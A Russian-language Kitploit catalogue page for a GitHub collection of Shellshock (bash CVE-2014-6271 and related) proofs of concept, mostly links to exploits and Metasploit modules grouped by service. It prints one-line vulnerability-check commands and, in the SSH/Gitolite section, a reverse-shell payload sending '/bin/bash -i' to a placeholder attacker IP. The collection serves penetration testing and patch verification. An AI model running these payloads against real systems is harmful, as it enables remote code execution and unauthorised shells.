Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
shellshocker-pocs — Коллекция доказательств концепций и потенциальных целей для #ShellShocker | Kitploit
Инструменты/GitHubGitHub/mubix/shellshocker-pocs
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеПодобранные Ресурсы
GitHubmubix/shellshocker-pocs

shellshocker-pocs

Коллекция доказательств концепций и потенциальных целей для #ShellShocker

Репозиторий
8891906 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Shellshocker — репозиторий с Proof of Concept кодом для «Shellshock»

Коллекция Proof of Concepts и потенциальных целей для #ShellShocker

Ссылка на Wikipedia: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Пожалуйста, отправьте pull request, если у вас есть дополнительные ссылки или другие ресурсы

Предположения (не подтверждено, возможно, уязвимо):

  • XMPP(ejabberd)
  • Mailman — подтверждено, что не уязвим
  • MySQL
  • NFS
  • Bind9
  • Procmail см.
  • Exim см.
  • Поиск Google для Juniper inurl:inurl:/dana-na/auth/url_default/welcome.cgi
    • через: https://twitter.com/notsosecure/status/516132301025984512
    • через: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
  • Оборудование Cisco
    • через: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
  • FreePB / Asterix исправлено здесь

Если вам известны PoC для любого из них, отправьте issue или pull request со ссылкой.

Командная строка (Linux, OSX и Windows через Cygwin)

  • bashcheck — скрипт для проверки на наличие последних уязвимостей

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

при уязвимости создаст файл echo в текущем каталоге с датой внутри

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

  • env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
  • Дополнительная информация: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

CVE-2014-6277

при уязвимости произойдёт segfault

  • env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
  • Дополнительное обсуждение на fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9
  • Дополнительная информация: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

IBM z/OS —

  • http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

HTTP

  • Модуль эксплойта Metasploit — Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
  • Модуль эксплойта Metasploit — Advantech Switch Bash Environment Variable Code Injection (Shellshock)
  • Модуль эксплойта Metasploit — IPFire Bash Environment Variable Injection (Shellshock)
  • HTTP Header Polution от @irsdl — http://pastebin.com/QNkf7dYS
  • HTTP CGI-BIN — http://pastebin.com/166f8Rjx
  • cPanel — http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
  • Digital Alert Systems DASDEC — http://seclists.org/fulldisclosure/2014/Sep/107
  • F5 — https://twitter.com/securifybv/status/515035044294172673
    • https://twitter.com/securifybv/status/515035044294172673/photo/1
    • https://twitter.com/avalidnerd/status/515056463589675008
      • https://twitter.com/avalidnerd/status/515056463589675008/photo/1
  • Invisiblethreat.ca — https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
  • Версия для командной строки — https://gist.github.com/mfadzilr/70892f43597e7863a8dc
  • Пошаговое руководство на основе User-Agent с LiveHTTPHeaders — http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/

Phusion Passenger

  • https://news.ycombinator.com/item?id=8369776

DHCP

  • Эксплуатация TrustedSec через Tftpd32 — https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
  • Модуль эксплойта Metasploit — Dhclient Bash Environment Variable Injection (Shellshock)
  • Вспомогательный модуль Metasploit — https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
  • Perl-скрипт — http://pastebin.com/S1WVzTv9
  • использование Wi-Fi Pineapple для принудительного подключения пользователей к сети — http://d.uijn.nl/?p=32

SSH

  • Stack Overflow — http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
  • SSH ForcedCommand — https://twitter.com/JZdziarski/status/515205581226123264
    • https://twitter.com/JZdziarski/status/515205581226123264/photo/1
  • SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
  • Gitolite — https://twitter.com/Grifo/status/515089986161766400
    • $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
    • (необходимо иметь учётную запись git на сервере)

OSX

  • Повышение привилегий через VMware Fusion — https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
  • Исправление: http://support.apple.com/kb/DL1769

OSX — с обратным DNS (CVE-2014-3671.txt)

  • Пример файла зоны: in-addr.arpa, содержащий пример CVE-2014-6271.
  • Пример файла с getnameinfo(), который передаёт данные в setenv(): osx-rev-ptr.c
  • Advisory с описанием вышеуказанного CVE-2014-3671.txt

SIP

  • SIP-прокси: https://github.com/zaf/sipshock

Qmail

  • Подробное пошаговое руководство — http://marc.info/?l=qmail&m=141183309314366&w=2
  • Твит от @ymzkei5 — http://twitter.com/ymzkei5/status/515328039765307392
    • http://twitpic.com/ec3615
    • http://twitpic.com/ec361o

Postfix

  • http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

FTP

  • Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
  • Модуль эксплойта Metasploit — Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

OpenVPN

  • OpenVPN — https://news.ycombinator.com/item?id=8385332
  • Пошаговое руководство по PoC от @fj33r — http://sprunge.us/BGjP

Oracle

  • Оповещение и список затронутых продуктов

TMNT

  • https://twitter.com/SynAckPwn/status/514961810320293888/photo/1

Hand

  • Через @DJManilaIce — http://pastie.org/9601055
root@kitploit:~
user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
           __ __
          /  V  \ 
     _    |  |   |
    / \   |  |   |
    |  |  |  |   |
    |  |  |  |   |
    |  |__|  |   |
    |  |  \  |___|___
    |  \   |/        \ 
    |   |  |______    |
    |   |  |          |
    |   \__'   /     |
    \        \(     /
     \             /
      \|            |

CUPS

  • Модуль эксплойта Metasploit — CUPS Filter Bash Environment Variable Code Injection

IRC

  • Модуль эксплойта Metasploit — Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
  • Модуль эксплойта Metasploit — Legend Perl IRC Bot Remote Code Execution

Скрипты от @primalsec

  • shell_shocker.py — удобен для взаимодействия с известным уязвимым URL для передачи команд (метод User-Agent)
  • w3af_shocker.py — автоматизирует процесс запуска сканирования w3af spider/shell_shock (метод User-Agent)
  • shell_sprayer.py — проверяет список URL из файла или отдельный URL по известному списку ресурсов cgi-bin (метод User-Agent)
Скачать инструмент
  • Пошаговое руководство на основе User-Agent с Burp — http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
  • На основе User-Agent, но с поддержкой Tor и Socks5 (Python) — https://github.com/lnxg33k/misc/blob/master/shellshock.py
  • На основе User-Agent на Ruby — https://github.com/securusglobal/BadBash
  • Простой сканер на основе заголовков с использованием sleep и поддержкой многопоточности — https://github.com/gry/shellshock-scanner
  • shocker — проверяет список URL из файла или отдельный URL по списку известных уязвимых CGI-ресурсов (метод Content-type)
  • Xymon — https://lists.xymon.com/archive/2014-September/040350.html
  • QNAP — https://www.exploit-db.com/exploits/36503